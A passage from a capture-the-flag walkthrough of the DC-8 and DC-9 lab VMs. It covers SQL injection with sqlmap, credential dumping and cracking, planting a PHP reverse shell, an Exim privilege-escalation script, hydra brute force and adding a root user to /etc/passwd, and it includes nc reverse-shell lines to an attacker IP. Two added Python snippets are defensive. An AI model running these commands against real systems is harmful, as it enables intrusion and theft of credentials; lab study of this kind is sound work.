echo "mkfifo /tmp/fmsr; nc 192.168.150.128 4444 0</tmp/fmsr | /bin/sh >/tmp/fmsr 2>&1; rm /tmp/fmsr" >> backups.sh

Later I rebooted the VM and tried the reverse shell again, and it worked. Amazing 🤣

DC-8

An nmap scan of live hosts and ports shows ports 22 and 80 open:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
|   256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_  256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open  http    Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache

Port 80 is a Drupal site with the following information:

The /CHANGELOG.txt file listed in robots.txt is worth a look; it reveals the Drupal version, 7.67.

Searching for vulnerabilities in that version turns up nothing useful here 😒

Looking back at the functional blocks on the page, there is a suspicious parameter, ?nid=1. Appending a ' to it produces the following error:

Running sqlmap against it reveals a suspicious database, d7db:

sqlmap -u http://192.168.150.154/?nid=1 --batch --dbs
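The error produced by the stray ' comes from user input being spliced into the SQL text. As an added example, not from the original post, the following Python/sqlite3 snippet puts the vulnerable lookup next to a parameterised one and shows how each reacts to the same inputs; the table, its rows and the function names are constructed for the demo.

```python
import sqlite3


def setup_db():
    """Build an in-memory table shaped like the page's ?nid= lookup (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE node (nid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO node VALUES (?, ?)",
                     [(1, "Welcome"), (2, "About"), (3, "Contact")])
    return conn


def lookup_vulnerable(conn, nid):
    """The pattern behind the page's error: the parameter is spliced into the SQL string."""
    sql = f"SELECT nid, title FROM node WHERE nid = '{nid}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, nid):
    """Parameterised version: the value is bound as data and cannot alter the query."""
    return conn.execute("SELECT nid, title FROM node WHERE nid = ?", (nid,)).fetchall()


def probe(conn, fn, value):
    """Run a lookup and report ('rows', n) or ('error', message) instead of raising.
    An error surfacing for a quote character is the signal the write-up observed."""
    try:
        return ("rows", len(fn(conn, value)))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = setup_db()
    for value in ("1", "1'", "1' OR '1'='1"):
        print(repr(value),
              "vulnerable:", probe(conn, lookup_vulnerable, value),
              "safe:", probe(conn, lookup_safe, value))
```

The parameterised lookup returns zero rows for the quoted inputs instead of an error or the whole table, which is also why a proper fix removes the error-based signal that sqlmap relied on here; suppressing the error message alone would leave the injection in place.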

Listing its tables gives the following:

sqlmap -u http://192.168.150.154/?nid=1 --batch -D d7db --tables

Dumping the users table shows two users, admin and john:

┌──(root💀hacker)-[~]
└─# sqlmap -u http://192.168.150.154/?nid=1 --batch -D d7db -T users --dump
┌──(root💀hacker)-[~]
└─# sqlmap -u http://192.168.150.154/?nid=1 --batch -D d7db -T users -C name,pass --dump
Database: d7db
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+

Cracking the hashes gives john's password: turtle

With that we can log into Drupal.

Content -> Add content -> Basic page only allows plain text here, so PHP code cannot be added that way.

Looking further, Contact Us -> Form settings accepts PHP code, so enter php-reverse-shell there and save.

Then fill in the contact form and click Submit to trigger the reverse shell, and spawn an interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Next, check for exploitable SUID binaries; this turns up an unusual SUID binary, /usr/sbin/exim4:

find / -perm -4000 2>/dev/null

The exim version is 4.89, and searching for related vulnerabilities finds "Exim 4.87 - 4.91 - Local Privilege Escalation".

Start a web server and upload the sh file; here you have to change to /tmp to have write permission:

cd /tmp
chmod 777 46996.sh
bash ./46996.sh -m netcat
nc -e /bin/sh 192.168.150.128 4444

Run the sh file and catch the nc reverse shell; that gives root and the flag.

DC-9

An nmap scan of live hosts and ports shows port 80 open.

Port 80 looks like this:

Looking at the functional blocks, whatever is typed into the Search module is sent to results.php.

So capture the request in Burp and save it to a text file.

Then feed that request to sqlmap to enumerate the databases:

┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch --dbs
available databases [3]:
[*] information_schema
[*] Staff
[*] users

Listing the tables shows a UserDetails table:

┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch -D users --tables
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

Dumping it reveals the following users:

┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch -D users -T UserDetails --dump
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

Now look at the Staff database; looking up the admin hash on cmd5 gives the password: transorbital1

┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch -D Staff --tables
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch -D Staff -T Users --dump
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

Logging into the admin panel succeeds, and the footer shows the message "File does not exist".

So try a file inclusion, and /etc/passwd can indeed be read:

?file=../../../../etc/passwd

The earlier nmap result shows ssh port 22 as filtered, so there is probably some mechanism that opens it on demand. Checking for a port-knocking setup, we find /etc/knockd.conf, which reads as follows:

22/tcp filtered ssh

[options] UseSyslog

[openSSH]
sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

Then knock on the ports in order, 7469, 8475, 9842, with the knock command, and rescan with nmap to check whether ssh is now open:

knock 192.168.150.155 7469 8475 9842
nmap -p22 192.168.150.155

Using the credentials from the UserDetails table earlier, a hydra run shows that three users can log in over ssh:

┌──(root💀hacker)-[~]
└─# hydra -L users.txt -P pass.txt 192.168.150.155 ssh
[DATA] attacking ssh://192.168.150.155:22/
[22][ssh] host: 192.168.150.155   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.150.155   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.150.155   login: janitor   password: Ilovepeepee

In janitor's home directory there is a file passwords-found-on-post-it-notes.txt:

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Another hydra run with these passwords yields one more set of credentials, fredf/B4-Tru3-001; this user will probably help with privilege escalation.

Log in over ssh as fredf and run sudo -l: test can be run as root without a password.

Running test on its own does nothing useful, though; it needs the arguments test.py expects:

Usage: python test.py read append

Use find to locate test.py; it is in /opt/devstuff. Reading the code shows that it reads one file (the first argument) and appends its contents to a second file (the second argument):

fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test.py" -type f 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py

So we can use test to append a user with root privileges to /etc/passwd and escalate.

First generate a salted password hash with openssl:

┌──(root💀hacker)-[~]
└─# openssl passwd -1 -salt salt password
$1$salt$qJH7.N4xYta3aEG/dfqo/0

Then change to /tmp, write the root-privileged user entry into /tmp/root, and use test to append /tmp/root to /etc/passwd. Switching to that user then gives root and the flag:

echo 'harvey:$1$salt$qJH7.N4xYta3aEG/dfqo/0:0:0::/root:/bin/bash' >> root
sudo /opt/devstuff/dist/test/test /tmp/root /etc/passwd
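The entry appended here is exactly what an integrity check on /etc/passwd should catch. As an added example that is not part of the original post, the Python function below audits passwd-format lines for a second UID 0 account, hashes stored outside /etc/shadow, empty password fields and malformed entries; the sample file and the issue labels are constructed for the demo.

```python
# Constructed /etc/passwd content for the demo, including the kind of entry the write-up appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1000:1000:Fred,,,:/home/fredf:/bin/bash
harvey:$1$salt$qJH7.N4xYta3aEG/dfqo/0:0:0::/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""

# Password-field values that mean "look in /etc/shadow" or "locked".
SHADOWED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Yield (lineno, fields) for every non-empty line; no validation here."""
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.strip():
            yield lineno, line.split(":")


def audit_passwd(text):
    """Return sorted (user, issue) pairs for entries that should not exist on a
    shadow-password system."""
    findings = []
    seen = set()
    for lineno, fields in parse_passwd(text):
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed-entry"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append((name, "duplicate-username"))
        seen.add(name)
        if pw == "":
            findings.append((name, "empty-password"))       # login with no password at all
        elif pw not in SHADOWED:
            findings.append((name, "hash-in-passwd-file"))  # hashes belong in /etc/shadow
        if not uid.isdigit() or not gid.isdigit():
            findings.append((name, "non-numeric-id"))
        elif uid == "0" and name != "root":
            findings.append((name, "uid-0"))                # a second root-equivalent account
    return sorted(findings)


if __name__ == "__main__":
    for who, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{who}: {issue}")
```

Run against a live system this belongs in a file-integrity job (AIDE, or a simple hash of /etc/passwd compared on each run) rather than a one-off check; and the root cause on this box, a sudo rule that lets a helper append to any path, is fixed by having the helper take its destination from a fixed allowlist instead of a command-line argument.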
Originally published 2023-01-25 on the author's personal site/blog; syndicated to the Tencent Cloud community.
